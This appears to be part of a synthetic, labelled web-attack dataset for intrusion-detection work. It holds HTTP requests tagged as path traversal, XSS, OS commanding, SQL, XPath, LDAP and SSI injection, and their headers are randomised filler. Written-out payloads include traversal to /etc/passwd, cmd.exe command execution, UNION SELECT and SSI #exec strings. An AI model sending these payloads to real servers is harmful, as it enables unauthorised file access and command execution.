Referer: /p9eg7/rossRQs/itawtcm/lom0/Le4ea.dll
TE: trailers
Trailer: Accept-Encoding
User-Agent: ntni (roIWPVyT)
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8555x781
Via: HTTP/6.0 www.nctttu.html
Transfer-Encoding: gzip
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38353
Start - Id: 36319
class: PathTransversal
GET /oho8tlunsepnNu/m.mzFpKB9Z.bin?azl71wBAMS5-=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&I4B-uX=cN-0IloQ7VYO&crolKayashm2Di=+ne HTTP/1.1
Host: www.tyhtia.org
Connection: close
Accept: */*
Accept-Charset: iso-8859-8, hz-gb-2312;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 204.44.253.203
Cookie: snsu3ieles4i=086;ylhna7pri=erh-yUqaxVzQ
Cookie2: $Version="628"
Date: Tue, 12 Oct 04 01:12:26 UTC
ETag: W/"XVnSSkhMGncEq258"
Expect: 4soo
From: 5ygo@eiccrasaq.org
If-Modified-Since: Fri, 13 May 05 14:06:49 CET
If-Unmodified-Since: Sun, 13 Feb 05 11:42:06 GMT
If-Match: *
If-None-Match: *
If-Range: "B@RpB24hyMdcOlcD"
Max-Forwards: 5521
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic aTFhdGw6bmFhc0ZIZWE=
Authorization: Basic dVNhZWNjczp0bW1laHllbA==
Range: -399013
Referer: /bsleeio/bstDd/7hsdk/sboosh.js
TE: trailers,deflate;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/0.0 (X11; U; SunOS sun4u 6.0; ah-ee; rv:7.1.7) Gecko/38734935
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 645x5981
Via: FTP/5.8 58.143.76.214, 0.1 www.w4aqilad.html, 5.6 www.9se0.gif
Transfer-Encoding: identity
Upgrade: cdl/2.8, oueiab/2.3, nfnoc/8.1
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 10989646571343616
----: ----------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36319
Start - Id: 36326
class: PathTransversal
GET /5sredfnucaa0i/seonedrn9ebah4/lYuNOoMeD/ueoo/OlocationmunionGGVahtpassZacceptE/sQ_EEEGzEY@p6AE.pl?nen=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&hediprsy=aYrdsephT&cp=496 HTTP/1.0
Host: www.sIzcy.net:01
Connection: cawmtrn
Accept: */*;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=44
Client-ip: 112.98.95.4
Cookie: wroecnttst=hhautoexectkakltelnetnE;0sy3ea4jtvo=096;1Lkrtmne=cwqu+
Cookie2: $Version="74"
Date: Wed, 10 Oct 07 02:20:31 GMT
ETag: W/"XVnSSkhMGncEq258"
Expect: Ise1ssl
From: 5ygo@eiccrasaq.org
If-Modified-Since: Mon, 27 Dec 04 07:48:06 CET
If-Unmodified-Since: Sun, 19 Aug 07 05:16:47 GMT
If-Match: *
If-None-Match: "G4_zTr.Z2pmJyXh"
If-Range: Wed, 18 Jan 06 23:53:39 GMT
Max-Forwards: 5829
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dTR1T3RUZWJpb2FwNG9xeHRzNWhlNmxybnNOYjZoNG9zc3V0ZW5zaTJpZU10Y2d0
Range: 94941-674,-88804,1546-98301
Referer: http://www.bmaeap.it/i4tsaie3/19prncFe.js
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/2.1 (compatible; MSIE 0.1; Win 9x; euTsaknnn; kmuepr)
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 625x983
Via: 0.6 209.184.122.136:44654, FTP/9.5 www.nwomeWer.jpg, deh/2.2 www.ttsxys.shtml
Transfer-Encoding: no3e6; Deis=JdtodNk
Upgrade: 7Eret/1.3
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 876584717
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36326
Start - Id: 46649
class: XSS
GET /3JxdtF36G57E99EBd/5dNtqrrahcadxvre/pp9A8RzFnoeF_imNLo/6@iF720bfW-lnHsE4RDs.shtml?6aaAlh=udelete&3Wl75bx=196533288&bl=Aiza&Qt8i-null9YBRQ=nfTi&dExoQ8iDVq8=219176760&ohlqbjau=itstEt6lcsI&ebpdogmceois2If=oe%2B&spGtwd=ttxasojaS0&Vcopyu9IB=aBl6W4GXRD&fetiloe8Onldg=+rdn%2B&Te=tefabhSe&9oJeseOd=goaep%3Ar&2tph1uiresn=agoi++E%3Dnvu6e%27n HTTP/1.1
Host: 239.35.213.142
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-ce;q=0.0, us-ascii
Accept-Encoding: <style   ><!--</style ><script>[alert ('aovt');]//--></script >
Accept-Language: 0nwysieG-e;q=0.8
Client-ip: 115.198.136.94
Cookie2: $Version="6"
Date: Wed, 20 Jan 10 01:55:11 GMT
Expect: gei7wtf
If-Match: "lHSezSEt.gStwiZ"
If-None-Match: *
Referer: /sahrP/enfaic/csbYyav/oeitDr.php
User-Agent: uppug84rb/0.1.3
Via: 3.4 213.137.87.147, FTP/7.6 www.r5k7ooh.gif:0, HTTP/7.9 63.61.20.187
Transfer-Encoding: gzip
Upgrade: dsZ4sm/9.0, S3s/4.3, i9u9oA/9.6

null

End - Id: 46649
Start - Id: 44354
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.tl3ichi.org:670
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a5Eeie-eian;q=0.8, srcg-p52cwo
Cache-Control: max-stale=5
Client-ip: 206.144.99.228
Cookie: isvhnienixoN8to=eGJZ_Ghj;Tisnlm=012323
Cookie2: $Version="2"
Date: Sat, 25 Sep 04 20:28:44 CET
ETag: "EeqXjCS5PORBp-bwP8v4"
Expect: 100-continue
From: oehrc@o8se.com
If-Modified-Since: Tue, 20 Oct 09 19:18:24 UTC
If-Unmodified-Since: Fri, 01 Dec 06 03:19:01 UTC
If-Match: "GJMFDmKTB_d_BJ8FQB"
If-None-Match: *
If-Range: "Om_ZesJafUZ9OevCH"
Max-Forwards: 1
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest response="f8b735a06dFFbEaA6Aeea2DfB9Fb33d2"
Range: -601,-24981
Referer: /mrEeb0/geuscvm/r6nrmjoe/hetcl8tx/Dgaergcs.tar
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/3.9 (Windows; U; Windows NT 0.3; eA-at; rv:2.6.8) Gecko/68593699
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.nea5ttS.css, sywoe/1.4 19.129.86.156:6, 8.9 73.48.109.8
Transfer-Encoding: deflate
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 7714827508800
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44354
Start - Id: 44723
class: PathTransversal
POST /8ltthql/Pe8passthru1ropenh1g/S8Zg5/8.r.8uvYI/DEriaddksdse1ahourq/eCobt_551FejT.S.php3? HTTP/1.0
Content-Length: 281
Content-Language: ewei,eu,eysse
Content-Encoding: compress
Content-Location: http://r3dzna.be/ni7ea/vlohgu0n/vniEtsh/er3scs.sh
Content-MD5: QWh3ZHJTYUl0c2x0bm5ocw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Apr 04 14:54:25 GMT
Last-Modified: Wed, 27 Oct 04 03:02:06 CET
Host: 250.179.78.135
Connection: ehRnd
Accept: video/mpeg;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: AshAfIs-vashs;q=0.7, amgkh8E-to;q=0.7, oo-wiuua;q=0.2, r0nslfs-dio
Cache-Control: min-fresh=5
Date: Mon, 18 Dec 06 16:53:44 CET
Expect: 3tnOdwe7=nohiayee
If-Modified-Since: Fri, 15 Aug 08 02:55:37 GMT
If-Match: *
If-None-Match: "T.ZMdFoWhX-xysZWyc"
Max-Forwards: 629
Referer: http://www.0ongtlwe.org/0ye3tzhi/nfeatErj/hmnn.asmx
User-Agent: Mozilla/5.7 (Windows; U; WinNT 8.7; wb-oT; rv:9.8.5) Gecko/80515751
Via: htn/1.6 www.bHid.jpg, 8.7 241.137.9.191, 9.4 188.109.92.187

rbtc2potpsdrNei=ih3OFKZ&sche=U2 ep8rossh&tiaeamdim=./.././../&adevoadasehg=S4xebAer&sisAbehhfwl=ias1y&ul=EeuodepbeosynhhrS&iae=xadmint)ittleeeB@(csh'ra&tguawcceneossj=49232&wryto6ceootm=ibinhnaspn1nq&brEete=svistlmder5es&zo=05&t1NlcUnnuyew=oyikreabgelnhmee&note=494

End - Id: 44723
Start - Id: 41600
class: SqlInjection
GET /eyqNklQTC@-mw/iuhessar/EILqw/stO1ndzlisdrety/7yxpfmzfRnhkdej5/f0EQOCBlXt7ilLvs/8Lfnodef4XC0I78.Ilocation/yB/Iteg/Mc4wp-X-k0.html?fdns=homj&rdsshegrr=%25irypassthruiut0ahliKzebnat&eolaeUei=ebeiusernvr&1uyrnltntx=%27%29++++UN%2F**%2FION++ALL+SEL%2F**%2FECT+++++%27rtt4oaO%27%2C6222%2C5%2C%27hAmaac%27%2C9++++FROM++Ahh+++WHERE++++%28+%27%27++++%3D%27&styleQl61mochaS5e9g=448&teb4mfdwzl=ore%3Cplrogn&6ruu6e3vayaep=evlats%3AmOIi HTTP/1.0
Host: www.aoesmjem.be
Connection: ehxPU7L
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.5
Cache-Control: max-stale=3570
Client-ip: 66.83.180.190
Cookie: AL9pxBGw3AZ=ss;hoa;sDperlE=enoixlertraqui;_and8Y=img8insert;Vtm5ihrkiad=75501720
Cookie2: $Version="7"
Date: Tue, 30 Jun 09 05:46:45 UTC
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: eqidtzo
From: eimuyt@enr2so.ch
If-Modified-Since: Fri, 26 Mar 10 02:31:42 GMT
If-Unmodified-Since: Fri, 27 May 05 21:05:27 UTC
If-Match: "FNb32QmO6UyZC7_8"
If-None-Match: "H3z-6TTwNx-g5OH"
If-Range: Sun, 29 Aug 04 16:47:55 GMT
Max-Forwards: 58
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: mntre es5jmh0t=sta8dmeb
Authorization: Basic dGFhZWk6ZmZxTGF5Zg==
Range: 9034-
Referer: /3efumcPl/rewT/yc5he/iGrs.pdf
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 5.1; fr-es; rv:2.4.7) Gecko/59701043
UA-CPU: StrongARM
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 5.3 www.2ott.jpeg, FTP/2.5 www.plpn.jpeg:8189
Transfer-Encoding: compress
Upgrade: w6of/9.8
Warning: 546 www.haslz.jpeg "O9dygy07fAaes" "Tue, 03 Jan 06 08:40:36 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41600
Start - Id: 49832
class: XPathInjection
GET /e_tRxr@xfJQ92/nkedpG1nsoztrrksso/ACanareg5rdp/yvGkT/ctbopdmaf/aeI1iFoUO@LRY.asp?UPtdLtk3.elid=28&opds9tcdh=40290&tddcZheRepokrza=2&yhkqUT2Z=a+replace&Oedu=eieEhexecz%3Ab%7E+oeei&savRtS=lo4%27+++++or+%28i++%3C+++++count%28ls8t%2Fchild%3A%3Atext%28%29%29+and++++j+++%3C+++++count%28li%2Fchild%3A%3Acomment%28%29%29+and+k+%3C++++count%28ef1n%2Fchild%3A%3A*%29+%29++++or+++++%27r2so%27++%3D++++%27+++++hto%27++++or&sn=i%7CexecYt%2B&elvFCRio=65063&Df9hheseen=+%40Ene&rsrtsneesr7i=9sweoscuk&oE0r=0dkeindu+ HTTP/1.0
Host: www.iciman.it
Connection: tifBduhs
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, identity;q=0.6, gzip, deflate;q=0.9
Accept-Language: ON-ry;q=0.3
Cache-Control: min-fresh=4572
Client-ip: 77.69.248.51
Cookie: 0sibelidrr=A8;3sittzGIYVx=ossen;btleRisinclibg=32
Cookie2: $Version="7"
Date: Wed, 10 Aug 05 10:47:10 CET
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: ele9Pdda=mnl2
From: noamdhg@Dea3h8.biz
If-Modified-Since: Mon, 05 Nov 07 10:00:39 GMT
If-Unmodified-Since: Tue, 27 Jan 09 09:02:40 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Apr 10 07:25:47 GMT
Max-Forwards: 01
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Basic bW5yb25uNzplT2VkdGg=
Range: -16,498057-,69-3
Referer: /iesh.asp
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.6 (Windows; U; Win 9x 3.9; ga-ll; rv:6.8.5) Gecko/44931964
UA-CPU: Sparc
UA-Disp: 662,518,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 172x6984
Via: meZ/5.9 www.reeirinz.htm:4
Transfer-Encoding: identity
Upgrade: oega/2.1, oaa/9.5, pharkT/6.9, nba/7.2, nha/2.3
Warning: 539 163.222.151.131 "oqahsnbhdol" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49832
Start - Id: 43923
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.eqwxTe8rss.net:3578
Connection: close
Accept: image/jpeg, audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Ie6nzYyd-vzfeeed
Cache-Control: min-fresh=8437
Client-ip: 22.30.133.135
Cookie: ti8oldhg=ndq;oet0=6767318;mdgtpsu9=ongriGolibqis8ee
Cookie2: $Version="50"
Date: Sat, 30 Dec 06 19:41:39 CET
ETag: W/"vie1Rh-65y4FyKK@u97g"
Expect: E1rm8N
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Sat, 19 Feb 05 05:22:48 UTC
If-Unmodified-Since: Tue, 02 Jan 07 20:21:25 UTC
If-Match: "Hpz7QkwsSHPIH8@F"
If-None-Match: *
If-Range: *
Max-Forwards: 160
MIME-Version: 9.1
Pragma: nepwates=tdpISl4y
Proxy-Authorization: Digest nonce
Authorization: Basic ZWFmNTpsdHQ5Ug==
Range: 6652-,-36477,66590-93
Referer: /dph2e/dxnyshsh/2nitoRr.exe
TE: gzip;q=0.5
Trailer: Accept-Charset
User-Agent: Mozilla/5.6 (Windows; U; Windows NT 8.3; cn-rt; rv:3.7.0) Gecko/73609904
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 428x0275
Via: Clns0/8.4 167.145.164.92, 0.6 195.124.215.252, het/7.8 157.222.240.241
Transfer-Encoding: identity
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 684 71.187.135.86:599 "7Aoc3tmse" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43923
Start - Id: 45449
class: PathTransversal
GET /egN4BAFGcm05CHQ/uK_51cP-h76NQN3FA/ekJMab.c49/l.L./rmPPxcdyU_R-.XOxD@/8y/rr2ekwdeasthOcftdma/scriptWPVm6Rexga6y0c/bgfRteaveoees6Dhqile/5GPM0kZu7.js?oh=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: www.eoinxq.biz:986
Connection: gtdCy
Accept: */*;q=0.3
Accept-Charset: windows-1253
Accept-Encoding: 
Accept-Language: lteczar-teroh;q=0.4, scteIe-s9gmds;q=0.6, Sew-sTit;q=0.8
Cache-Control: max-age=700
Cookie: execWbF5W=4;e7meet=002503618;D5sK9=An0i;eu=i3HmQmU0Fstt;yie=xh ;cogtesthMalen=0820716
Cookie2: $Version="1"
Date: Sun, 20 Jan 08 12:32:19 UTC
Expect: 100-continue
If-Modified-Since: Mon, 23 Apr 07 11:28:36 CET
If-Unmodified-Since: Sun, 04 Oct 09 11:19:01 UTC
If-Match: *
If-None-Match: "N4jMZwqNgiTMlIPp"
If-Range: Mon, 05 Sep 05 04:03:44 UTC
Max-Forwards: 04
Pragma: c=s2n1e
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: nsdv ile3nao=dlotitcy
Range: -8
Referer: http://www.ator2.org/teetuas.aspx
TE: trailers,trailers
User-Agent: Mozilla/5.0 (X11; U; Unix 0.0; sm-9E; rv:4.2.7) Gecko/13366920
UA-Disp: 5353,5285,32
UA-OS: FreeBSD
Via: 6.5 www.oaZ6aa.shtml:467, 5.1 www.hsoHnt.jpg, 9.2 232.228.101.60
Transfer-Encoding: compress
Upgrade: ldu4yj/2.7, bmeN/8.1, deh/2.9
Warning: 895 95.106.146.142 "tark01bhtisa" 
X-Forwarded-For: 176.191.17.103
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45449
Start - Id: 40307
class: SSI
GET /rlsaod0la2thidaNpne/eicnn/ttstgedThttCsxlvxrol/t.jo3mCFDRAA17Wp0/i-5/ii/5lXO3.shtml?te=59625&79Hwo=1hn6Elton&95JallreplaceIm@insertfWin=os&oiPN=lOlns1ooEflse&ekrLrtasi=0402&toia4opMrix5nhs=sq_YKe0F-Zw%40&po=vu8mhhlhO2jed&EZb7FXW-=496644&etue12=nt0p3l&eCsscriptT.kn=870690&iuLofne=%7Cie&hfqbruN=hX4I&aet=%3C%21--+++++%23exec+cmd%3D%22c%3A%5Cprogra%7E1%5Coazhnr0%5Ct3twA%5CcXf.exe+++++d%3A%5Cufwmtf4g%5Cwww.naatstnd.org%5C3oEdy%5Cdatabase.mdb++++%2Fx+++++exporttofoxpro%22--%3E&a1rhes5yed9r=09 HTTP/1.1
Host: 170.156.147.216
Connection: Aehe69ht
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: ba-emuhc2pw, inmRil-kge0s;q=0.6, 6O-lmehs;q=0.9, r-oeouaehf, 8ssojtui-vrr;q=0.7
Cache-Control: no-cache
Client-ip: 189.175.1.221
Cookie: huftcheo3sahse=2h0R;ubadtoEeyso= ofi;taemmd2=eXSQBwb.@;eznehaasod7I=y5AcQ;dtetK2rpp=adi2
Cookie2: $Version="373"
Date: Fri, 12 Mar 10 02:09:49 GMT
ETag: "1F1921YcPGhruWJ@c"
Expect: 100-continue
From: Yphp8ra@sCnoSst6.de
If-Modified-Since: Fri, 20 Feb 09 19:19:36 CET
If-Unmodified-Since: Fri, 05 Mar 04 07:19:56 CET
If-Match: *
If-None-Match: "y_SlT4_eRTvMnxD@Fu2p"
If-Range: *
Max-Forwards: 7435
MIME-Version: 3.6
Pragma: k1ih5L=eerhtEq
Proxy-Authorization: NTLM MTR2dHIxOWJoZWlrZ2huYWVUc2VubjJlYXhnb2k3ZXQ=
Authorization: NTLM ZW9zcnRmcjVvaWUwbGVyNmxlZWFpN3NhbHRpNjdGZXpvdG5lNGJkNGZlaGVoaW1j
Range: -2115,0045-233,-51
Referer: /icsH4/mrae/othi/adpsr.sh
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: daieree4ehre4
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2184x777
Via: 0.3 78.171.60.206
Transfer-Encoding: deflate
Upgrade: llx/6.8, susFt/0.9, sep2er/8.1, fxahr/9.5, oEs/3.3
Warning: 285 39.249.111.46 "orhrou3Uo8amdcneinui" "Sun, 02 Sep 07 09:37:14 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40307
Start - Id: 38752
class: LdapInjection
GET /sha1d5sQuldiytEdnlpt/ytm8nN7wErdIr/tdt7/usDVM61tmpPVv6NU9/i_WDS/K.KpassthruhdTGiKc@e8/thnlpthm9mdr.nsf?acgfDincrieods=eoep7W%28gfinje1%28aq%24w&z6rhm2t=ostu&lgnltSaBienni=%29+%28+++%7C%28il8n%3Dyre6*%29&e0Toen=%3E4bntmp&0Wd0_AF=177170&me=4idas%7Coanwp-n1Ltmpn&osrTieino4i7efo=1470931&Aiha1tz=gnorqm%3FpehuNyoa HTTP/1.0
Host: 94.240.15.138:80
Connection: iifhr
Accept: */*;q=0.9
Accept-Charset: iso-8859-8, ks_c_5601-1987;q=0.6, x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: w0q-f, nr-aHi2soz
Cache-Control: no-store
Client-ip: 111.176.120.104
Cookie: Etrd=nz;reah0TsoTdl=ded;eOoanxseSeHj=ftstpasswd;Oraofeoh1Xsofob=mlatt o0execrreetl;ecn3AhsgF1sG=i2ra
Cookie2: $Version="175"
Date: Fri, 07 Dec 07 24:46:11 CET
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: 100-continue
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 02 May 06 15:44:31 GMT
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: "7-pb-x1k3IqGY8PdeDlx"
If-Range: *
Max-Forwards: 09
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: Digest uri=/haeus.wav
Range: -6168,6-
Referer: http://yilji.cz/pN7bw.rar
TE: chunked
Trailer: Date
User-Agent: 6acRetRigla
UA-CPU: MIPS
UA-Disp: 8384,101,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 479x813
Via: 2.3 47.231.97.55:0
Transfer-Encoding: gzip
Upgrade: dEii/5.0, tdxit/7.6, ieed/6.6, lZat/6.5, ogl/2.1
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 205.210.81.15
X-Serial-Number: 91445747246733
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38752
Start - Id: 43682
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 237.144.203.48
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: hz-gb-2312, iso-2022-jp, shift_jis;q=0.4
Accept-Encoding: compress;q=0.8
Accept-Language: *
Cache-Control: min-fresh=73353
Client-ip: 177.192.198.50
Cookie: ailOuotew=b<styleda;objectr2Xmzmimgj=uhewep =1\hdas
Cookie2: $Version="4"
Date: Sun, 05 Dec 04 20:09:15 GMT
ETag: W/"S1TaRMTQKjjb-G6@X"
Expect: mhknea
From: o68nO@tetn70i.cz
If-Modified-Since: Wed, 27 Feb 08 19:17:13 UTC
If-Unmodified-Since: Wed, 23 Apr 08 18:01:02 GMT
If-Match: *
If-None-Match: "6FUvDFJhYCwcMuLU"
If-Range: *
Max-Forwards: 2
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic cWlyaWNibjplb241ZWdp
Authorization: Digest algorithm=MD5
Range: 42-91,822939-,-31
Referer: /aewEpyu.conf
TE: trailers,chunked
User-Agent: b@RXJF http://www.tlstsq.cz
UA-CPU: PowerPC
UA-Disp: 0760,6921,16
UA-Color: color16
UA-Pixels: 827x275
Via: 7.2 12.226.71.101
Transfer-Encoding: gzip
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 84513190969177426
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43682
Start - Id: 38447
class: LdapInjection
GET /yagt0dswn7yi/tsszvIerotunHn/usesr/ser/auWOn2.tiff?1NNMxgu4N=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&7OrRw=tmps2&aatti1t=mVupopy3JJ&cbRks6Dt8ie3tH=97&k8q.Mpasswdwindow.openeXW=fxlnDhLce HTTP/1.1
Host: www.yggeOudmro.st
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950;q=0.4
Accept-Encoding: *
Accept-Language: NUri-iRo, c5s3qu-i, oJegf-tzdegsy;q=0.8
Cache-Control: max-age=3749
Client-ip: 131.162.142.41
Cookie: c2id=2i1oa
Cookie2: $Version="31"
Date: Tue, 30 Oct 07 22:25:59 CET
ETag: "G3Txigpimi-nkqSesa"
Expect: 100-continue
From: ehrneaE@tHrzlsadoS.fr
If-Modified-Since: Sun, 11 Dec 05 09:46:08 CET
If-Unmodified-Since: Thu, 21 Jul 05 17:42:08 CET
If-Match: "oG9x.b0lraAL3oXqk46"
If-None-Match: "T8g1vDP.2RYgB8rzpg"
If-Range: "bGvh7y0uzwm5qZ8HAJC"
Max-Forwards: 7642
MIME-Version: 3.3
Pragma: yCt1pfre=rhb
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest cnonce="ohrEir"
Range: 86309-
Referer: http://uqno.gov/mhnita6/ouxneamh/snhzt.swf
TE: chunked;q=0.3,chunked;q=0.3,trailers
Trailer: If-Range
User-Agent: eg14wEeHtae9ond
UA-CPU: 68000
UA-Disp: 945,9874,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 5.9 67.169.5.10, rxIe/0.5 www.Rsry.jpg, FTP/8.1 www.itA3T.gif
Transfer-Encoding: identity
Upgrade: tunet/0.9, arant/2.6, wts/9.0, gdp/6.1
Warning: 437 66.2.246.8 "Ubflauttlali" "Tue, 23 Jun 09 09:36:33 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38447
Start - Id: 46454
class: PathTransversal
PUT /eBO4clK7lVKi/fXoS6SXTg0Av_3X/tstnrttf/fY/t1r253AF99POb/ebkelxamy/FRPTBTFq4bh.z6-/e8/8xqga-mUJY_JUi@A4e.sh? HTTP/1.0
Content-Length: 12
Content-Language: teiIrnkr,2ethte7,qdC
Content-Encoding: compress
Content-Location: http://www.xtuotg2t.org/Ulir/dh3np9.pl
Content-MD5: bHJxNWxwTGZkYTY4d2FkMQ==
Content-Type: application/x-www-form-urlencoded
Host: www.iteo.be
Connection: keep-alive
Accept: image/gif;q=0.6, audio/basic, text/*;q=0.9
Accept-Charset: x-mac-roman;q=0.6, ks_c_5601-1987
Accept-Encoding: deflate, deflate, identity
Accept-Language: *;q=0.3
Cache-Control: no-cache
Cookie: OjuuOps=unl94muwrre7;DihlnOig=\.\.\/\.\.\/etc\/passwd
Cookie2: $Version="9"
Date: Sun, 25 Oct 09 11:10:25 CET
ETag: "KkxgPBxgN.d5cW__M"
If-Unmodified-Since: Tue, 25 Aug 09 21:56:51 GMT
If-Match: *
If-None-Match: "Db@Wp4OrBROx@EHdX"
Max-Forwards: 9949
Pragma: rm='Ej'
Proxy-Authorization: g2eo eehmotgd=aSue
Referer: http://elathdss.fr/tbdr1oA/ae5ac/adiryyhO.cfm
TE: trailers,trailers
User-Agent: Mozilla/6.9 (Windows; U; Windows NT 0.3; Sn-eq; rv:0.2.5) Gecko/46569870
Transfer-Encoding: hdEqtt
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

nua=aebge9ex

End - Id: 46454
Start - Id: 39151
class: SSI
